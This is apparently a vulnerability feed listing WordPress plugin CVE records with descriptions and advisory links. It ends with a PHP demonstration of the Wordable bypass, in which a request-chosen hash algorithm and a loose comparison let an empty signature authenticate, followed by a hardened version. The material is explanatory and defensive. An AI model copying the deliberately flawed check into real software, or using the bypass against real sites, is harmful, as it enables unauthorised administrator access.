{"CVE_ID":"CVE-2023-1027","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the checkAllCategoryInSitemap function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to obtain post categories. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f589e21-7417-4b43-b580-4f1d3c2041f4\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f589e21-7417-4b43-b580-4f1d3c2041f4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2279","slug":"wpdirectorykit","versionImpact":"1.2.1","description":"The WP Directory Kit plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the 'admin_page_display' function. This makes it possible for unauthenticated attackers to delete or change plugin settings, import demo data, modify or delete Directory Kit related posts and terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Partial patches were made available in versions 1.2.0 and 1.2.1 but the issue was not fully patched until 1.2.2","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905795%40wpdirectorykit%2Ftrunk&old=2905046%40wpdirectorykit%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905795%40wpdirectorykit%2Ftrunk&old=2905046%40wpdirectorykit%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/admin\\\/class-wpdirectorykit-admin.php#L170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/admin\\\/class-wpdirectorykit-admin.php#L170\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a7a6da3-d67c-42b3-8826-7e7fc9b938b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a7a6da3-d67c-42b3-8826-7e7fc9b938b4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46086","slug":"affiliate-toolkit-starter","versionImpact":"3.4.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SERVIT Software Solutions affiliate-toolkit \u2013 WordPress Affiliate Plugin allows Reflected XSS.This issue affects affiliate-toolkit \u2013 WordPress Affiliate Plugin: from n\/a through 3.4.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-plugin-3-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-plugin-3-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24713","slug":"auto-listings","versionImpact":"2.6.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Auto Listings Auto Listings \u2013 Car Listings & Car Dealership Plugin for WordPress allows Stored XSS.This issue affects Auto Listings \u2013 Car Listings & Car Dealership Plugin for WordPress: from n\/a through 2.6.5.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/auto-listings\\\/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/auto-listings\\\/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0906","slug":"fx-private-site","versionImpact":"1.2.1","description":"The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API. This makes it possible for unauthenticated attackers to obtain page and post contents of a site protected with this plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fx-private-site\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fx-private-site\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-33941","slug":"ipanorama-360-virtual-tour-builder-lite","versionImpact":"1.8.1","description":"Missing Authorization vulnerability in Avirtum iPanorama 360 WordPress Virtual Tour Builder.This issue affects iPanorama 360 WordPress Virtual Tour Builder: from n\/a through 1.8.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2657","slug":"font-farsi","versionImpact":"1.6.6","description":"The Font Farsi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec6faa4-d8d3-4c5e-91b2-142164d3b481?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec6faa4-d8d3-4c5e-91b2-142164d3b481?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/font-farsi\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/font-farsi\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4271","slug":"svgator","versionImpact":"1.2.6","description":"The SVGator  WordPress plugin through 1.2.6 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1fe0bc7-a340-428e-a549-1e37291bea1c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1fe0bc7-a340-428e-a549-1e37291bea1c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5810","slug":"wp2speed","versionImpact":"1.0.1","description":"The WP2Speed Faster \u2013 Optimize PageSpeed Insights Score 90-100 plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.1. This is due to the use of hardcoded credentials to authenticate all the incoming API requests. This makes it possible for unauthenticated attackers to overwrite CSS, update the trial settings, purge the cache, and find attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe97ac1-cab9-4b6f-bddd-bdcdc9faee40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe97ac1-cab9-4b6f-bddd-bdcdc9faee40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L165\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3679","slug":"premium-seo-pack","versionImpact":"1.6.001","description":"The Premium SEO Pack \u2013 WP SEO Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.001. This makes it possible for unauthenticated attackers to view limited information from password protected posts through the social meta data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-seo-pack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-seo-pack\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37226","slug":"kanban","versionImpact":"2.5.21","description":"Missing Authorization vulnerability in Kanban for WordPress Kanban Boards for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Kanban Boards for WordPress: from n\/a through 2.5.21.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11409","slug":"grid-view-gallery","versionImpact":"1.0","description":"The Grid View Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0 via deserialization of untrusted input from cs_all_photos_details parameter. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-view-gallery\\\/trunk\\\/custom-slider-short-code.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-view-gallery\\\/trunk\\\/custom-slider-short-code.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a407d8b1-1d21-4b23-a8d6-a977544a19b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a407d8b1-1d21-4b23-a8d6-a977544a19b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11336","slug":"clickbank-storefront","versionImpact":"1.7","description":"The Clickbank WordPress Plugin (Storefront) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7. This is due to missing or incorrect nonce validation via the cs_menu page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickbank-storefront\\\/trunk\\\/admin.inc.php#L700\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickbank-storefront\\\/trunk\\\/admin.inc.php#L700\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11606","slug":"tabs-shortcode","versionImpact":"2.0.2","description":"The Tabs Shortcode WordPress plugin through 2.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76ae8f5b-2d0e-4bf5-9ae3-f76cd52dea8d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76ae8f5b-2d0e-4bf5-9ae3-f76cd52dea8d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13458","slug":"notice-faq","versionImpact":"2.2.1","description":"The WordPress SEO Friendly Accordion FAQ with AI assisted content generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'noticefaq' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-faq\\\/trunk\\\/noticefaq.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-faq\\\/trunk\\\/noticefaq.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/713f5bf5-f282-436e-8e8c-18543458bea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/713f5bf5-f282-436e-8e8c-18543458bea1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1648","slug":"yawave","versionImpact":"2.9.1","description":"The Yawave plugin for WordPress is vulnerable to SQL Injection via the 'lbid' parameter in all versions up to, and including, 2.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/atviksecurity.com\\\/yawave-wordpress-plugin-unauthenticated-sql-injection\\\/\",\"name\":\"https:\\\/\\\/atviksecurity.com\\\/yawave-wordpress-plugin-unauthenticated-sql-injection\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yawave\\\/trunk\\\/includes\\\/shortcode.liveblog.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yawave\\\/trunk\\\/includes\\\/shortcode.liveblog.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5cc21a-eb3a-429a-a0f9-0181d95a9eeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5cc21a-eb3a-429a-a0f9-0181d95a9eeb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2513","slug":"smartifw","versionImpact":"1.0.4","description":"The Smart Icons For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/includes\\\/media.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/includes\\\/media.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/smart_icons_for_wordpress.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/smart_icons_for_wordpress.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartifw\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartifw\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f5d8eac-fca9-4222-9a5f-a12748d298ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f5d8eac-fca9-4222-9a5f-a12748d298ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3521","slug":"wps-team","versionImpact":"3.4.0","description":"The Team Members \u2013 Best WordPress Team Plugin with Team Slider, Team Showcase & Team Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Social Link icons in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wps-team\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wps-team\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93b83e65-09d6-4ad5-85f3-d18a9a35f39d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93b83e65-09d6-4ad5-85f3-d18a9a35f39d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5938","slug":"digital-marketing-agency-templates-for-elementor","versionImpact":"1.1.1","description":"The Digital Marketing and Agency Templates Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the import_templates() function. This makes it possible for unauthenticated attackers to trigger an import via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-marketing-agency-templates-for-elementor\\\/trunk\\\/includes\\\/importer.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-marketing-agency-templates-for-elementor\\\/trunk\\\/includes\\\/importer.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3447438-1624-451a-a50c-981021399198?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3447438-1624-451a-a50c-981021399198?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8905","slug":"err-our-team","versionImpact":"1.0","description":"The Inpersttion For Theme plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0 via the theme_section_shortcode() function. This is due to the plugin not restricting what functions can be called. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server which is limited to arbitrary functions without any user supplied parameters.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/err-our-team\\\/trunk\\\/inc\\\/inpersttion-for-shortcode.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/err-our-team\\\/trunk\\\/inc\\\/inpersttion-for-shortcode.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4dc8ab-792b-41ff-a7b9-77a11c02d91b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4dc8ab-792b-41ff-a7b9-77a11c02d91b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1026","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the listPostsCategory function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to get post listings by category as long as those posts are published. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978d5715-7993-4f89-8d69-895467633bfb\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978d5715-7993-4f89-8d69-895467633bfb\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36724","slug":"wordable","versionImpact":"3.1.1","description":"The Wordable plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.1.1. This is due to the use of a user supplied hashing algorithm passed to the hash_hmac() function and the use of a loose comparison on the hash which allows an attacker to trick the function into thinking it has a valid hash. This makes it possible for unauthenticated attackers to gain administrator privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2234193\\\/wordable\\\/trunk\\\/wordable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2234193\\\/wordable\\\/trunk\\\/wordable.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1ab218-37bd-407a-8cb9-66f761849c21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1ab218-37bd-407a-8cb9-66f761849c21?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-plugins-and-themes-vulnerabilities-roundup\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-plugins-and-themes-vulnerabilities-roundup\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
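The Wordable record above describes two defects that bypass authentication only in combination: the hashing algorithm name is taken from the request and passed to hash_hmac(), and the result is compared with a loose (==) check. The PHP below is an added example, not code from the Wordable plugin or from any record on this page; SHARED_SECRET, the parameter names and the payload are constructed for the demo. On PHP 7, hash_hmac() returns false for an unknown algorithm name, and false == '' is true in PHP, so an attacker who controls both the algorithm and the signature can send an empty signature and pass the vulnerable check. PHP 8 throws a ValueError for an unknown algorithm instead; the example catches it only so that the comparison is exercised on both lines.

```php
<?php
// Added example, not code from the Wordable plugin or any record on this page.
// SHARED_SECRET, the parameter names and the payload are constructed for the demo.

const SHARED_SECRET = 'demo-secret-not-a-real-key';

// Vulnerable shape: the request chooses the algorithm AND supplies the signature.
function verify_vulnerable( string $algo, string $sig, string $payload ): bool {
    try {
        // PHP 7: unknown algorithm -> warning + false. The @ hides the warning,
        // as production code often does.
        $expected = @hash_hmac( $algo, $payload, SHARED_SECRET );
    } catch ( \ValueError $e ) {
        // PHP 8 throws instead; mirror the PHP 7 return value so the demo runs
        // on both and the loose comparison below is reached either way.
        $expected = false;
    }
    // Loose comparison: false == '' is true, so an empty signature is accepted.
    return $expected == $sig;
}

// Hardened shape: fixed algorithm, constant-time comparison of two strings.
function verify_hardened( string $sig, string $payload ): bool {
    $expected = hash_hmac( 'sha256', $payload, SHARED_SECRET );
    // hash_equals() never type-juggles and does not leak timing on mismatch.
    return hash_equals( $expected, $sig );
}

$payload = '{"role":"administrator"}';   // constructed request body

// Attacker controls both the algorithm name and the signature: bogus algorithm,
// empty signature. Only the vulnerable check lets this through.
var_dump( verify_vulnerable( 'no-such-algo', '', $payload ) );
var_dump( verify_hardened( '', $payload ) );

// A party that actually holds the secret still passes the hardened check.
$good = hash_hmac( 'sha256', $payload, SHARED_SECRET );
var_dump( verify_hardened( $good, $payload ) );
```

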